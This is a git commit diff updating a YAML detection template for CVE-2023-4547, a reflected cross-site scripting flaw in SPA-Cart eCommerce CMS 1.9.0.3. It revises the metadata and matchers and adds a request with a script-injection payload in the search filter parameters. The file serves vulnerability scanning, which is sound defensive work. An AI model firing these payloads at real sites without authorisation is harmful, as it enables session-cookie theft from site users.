Update CVE-2023-4547.yaml
parent
aee1efcca2
commit
b4f7f5a6ab
|
@ -1,36 +1,58 @@
|
||||||
id: CVE-2023-4547
|
id: CVE-2023-4547
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
|
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
|
||||||
author: SoSpiRo
|
author: theamanrawat,SoSpiRo
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
The attacker can send to the victim a link containing a malicious URL in an email or instant message and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
|
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/51713
|
- https://spa-cart.com
|
||||||
- https://vuldb.com/?ctiid.238058
|
- https://cxsecurity.com/ascii/WLB-2023080090
|
||||||
- https://www.tenable.com/cve/CVE-2023-4547
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
|
||||||
- https://cve.report/CVE-2023-4547
|
|
||||||
- https://cve.circl.lu/cve/CVE-2023-4547
|
|
||||||
- https://vuldb.com/?ctiid.238058
|
- https://vuldb.com/?ctiid.238058
|
||||||
|
- https://vuldb.com/?id.238058
|
||||||
classification:
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2023-4547
|
cve-id: CVE-2023-4547
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
|
epss-score: 0.00205
|
||||||
|
epss-percentile: 0.58171
|
||||||
|
cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: "true"
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: spa-cart
|
vendor: spa-cart
|
||||||
product: spa-cart_ecommerce_cms
|
product: ecommerce_cms
|
||||||
tags: cve,cve2023,xss,10web, spa-cart
|
tags: cve,cve2023,spa-cart,unauth,xss
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
|
||||||
- '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'
|
- '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: word
|
||||||
dsl:
|
part: body
|
||||||
- 'status_code == 200'
|
words:
|
||||||
- 'contains(body, "><script>alert(document.cookie)</script>") && contains(body, "©2016")'
|
- '100-1331"><script>alert(document.cookie)</script>'
|
||||||
condition: and
|
- '><script>alert(document.cookie)</script>bvu51'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<table class="products-nav">'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue